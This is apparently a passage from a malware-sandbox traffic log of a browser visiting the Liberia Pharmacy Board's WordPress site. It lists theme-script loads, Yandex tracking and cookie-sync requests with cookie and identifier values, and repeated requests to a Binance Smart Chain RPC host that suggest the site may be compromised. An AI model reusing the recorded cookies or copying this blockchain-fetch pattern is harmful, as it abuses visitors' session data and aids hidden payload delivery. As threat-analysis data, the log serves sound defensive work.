        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/enllax.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/parallax/translate3d.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/slick.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/scripts.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085448%3Aet%3A1736517288%3Ac%3A1%3Arn%3A547745590%3Arqn%3A1%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A6235%3Awv%3A2%3Ads%3A48%2C619%2C732%2C264%2C2544%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1736517279176%3Arqnl%3A1%3Ast%3A1736517290%3At%3ALiberia%20Pharmacy%20Board&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088%29ti%281%29&redirnss=1 HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.lpb.gov.lrSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yashr=3155343561736517290; yabs-sid=592303851736517291; i=ZhczPKj1Pp8lae9ib1TlFHUuJH6rvbsWqVPzsKIF/YzrWRf9LlXRFlQZNwaHbc+gmtAcojXRBA+HJxkuMOrmPVcje+w=; yandexuid=4571074561736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/02/Miscellaneous-480x360.jpg HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /images/core/emoji/15.0.3/svg/2705.svg HTTP/1.1Host: s.w.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/mandate2-1536x1152-1.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/comment-reply.min.js?ver=6.7.1 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /metrika/advert.gif HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.13 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide?token=10611.fH1OoSXDiCxpBQsjNz70vRcfoRCKnV72el8MOyZYUCNzPInswMVnZDixWZGJbZzcYCAPwYpj7I7oMEJSzlmlYQitO10RILaai2SvrMOULwtXGJey34xqsHUZbXqM2IFP8_R0NmA-LVPKkiCHFbb3UOiiVBU70YuNH0QeJGVsn8wIEyFktKtOCKdV6q2ne-bgGW8rqnWWD7Oz0Wepdc5Mf7W_6AMFUHHic0BLUHtJKnI%2C.6n504nlTozvgH4AdcQ2ltdTO0ZU%2C HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yashr=3155343561736517290; yabs-sid=592303851736517291; i=ZhczPKj1Pp8lae9ib1TlFHUuJH6rvbsWqVPzsKIF/YzrWRf9LlXRFlQZNwaHbc+gmtAcojXRBA+HJxkuMOrmPVcje+w=; yandexuid=4571074561736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_check_secondary HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yashr=3155343561736517290; yabs-sid=592303851736517291; i=ZhczPKj1Pp8lae9ib1TlFHUuJH6rvbsWqVPzsKIF/YzrWRf9LlXRFlQZNwaHbc+gmtAcojXRBA+HJxkuMOrmPVcje+w=; yandexuid=4571074561736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi
        Source: global trafficHTTP traffic detected: GET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085448%3Aet%3A1736517288%3Ac%3A1%3Arn%3A547745590%3Arqn%3A1%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A6235%3Awv%3A2%3Ads%3A48%2C619%2C732%2C264%2C2544%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1736517279176%3Arqnl%3A1%3Ast%3A1736517290%3At%3ALiberia%20Pharmacy%20Board&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088%29ti%281%29&redirnss=1 HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yashr=3155343561736517290; yabs-sid=592303851736517291; i=ZhczPKj1Pp8lae9ib1TlFHUuJH6rvbsWqVPzsKIF/YzrWRf9LlXRFlQZNwaHbc+gmtAcojXRBA+HJxkuMOrmPVcje+w=; yandexuid=4571074561736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi
        Source: global trafficHTTP traffic detected: GET /images/core/emoji/15.0.3/svg/2705.svg HTTP/1.1Host: s.w.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /metrika/advert.gif HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; i=p/dvHhu6BEOtGnOknp7XULB7pXFmRWE/R4UYGrMv0hKW6U9YSot04lO8lS6MHErrb2tV7Y4MjDVF80wdXY+zTWPtAzU=; yandexuid=3283792161736517292; yashr=6034268381736517292
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide?token=10611.fH1OoSXDiCxpBQsjNz70vRcfoRCKnV72el8MOyZYUCNzPInswMVnZDixWZGJbZzcYCAPwYpj7I7oMEJSzlmlYQitO10RILaai2SvrMOULwtXGJey34xqsHUZbXqM2IFP8_R0NmA-LVPKkiCHFbb3UOiiVBU70YuNH0QeJGVsn8wIEyFktKtOCKdV6q2ne-bgGW8rqnWWD7Oz0Wepdc5Mf7W_6AMFUHHic0BLUHtJKnI%2C.6n504nlTozvgH4AdcQ2ltdTO0ZU%2C HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; yp=1736603692.yu.4571074561736517291; ymex=1739109292.oyu.4571074561736517291#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; sync_cookie_ok=synced
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_start_secondary?redirect_domain=mc.yandex.com&token=10611.-yuCCBaYK4CRWSzmL9Jm4JCDqIWwZAny2ROmgX36wKGxzWyajnj8lBQ8tt0qLI52.ww_YVhfLx-sE7lYJHl7m8Ok-Tds%2C HTTP/1.1Host: mc.yandex.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; yandexuid=8715430261736517288; yashr=3268409401736517288; sync_cookie_csrf=1153950801fake
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide_secondary?token=10611.E_RPzEtQddV8vnmbmr337l8AhKpNAjExaO0ma2jrV489UWaaLcmew_vNOEzVVPlR4V0FkyWD6tXvOp-koVN4RFDajfKwVa-Gertbh0JBcbX7PWnGfqkkQHr8KV5-eSQqWHn092q-SAJ5wKt9uy2VlOci2cQHhZ5JYTT9ijqlRQDjDYA59lR6Mi019uer4JP27BgRTrcR1okFFbS3WOEs7pWSj2X1DAQIkARvPEEYVhY%2C.q-OV7mq2OrNzjNUPbRt_MqDduHY%2C HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; yp=1736603693.yu.8715430261736517288; ymex=1739109293.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/logo-1-150x150.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288; _ym_isad=2
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide_secondary?token=10611.E_RPzEtQddV8vnmbmr337l8AhKpNAjExaO0ma2jrV489UWaaLcmew_vNOEzVVPlR4V0FkyWD6tXvOp-koVN4RFDajfKwVa-Gertbh0JBcbX7PWnGfqkkQHr8KV5-eSQqWHn092q-SAJ5wKt9uy2VlOci2cQHhZ5JYTT9ijqlRQDjDYA59lR6Mi019uer4JP27BgRTrcR1okFFbS3WOEs7pWSj2X1DAQIkARvPEEYVhY%2C.q-OV7mq2OrNzjNUPbRt_MqDduHY%2C HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; 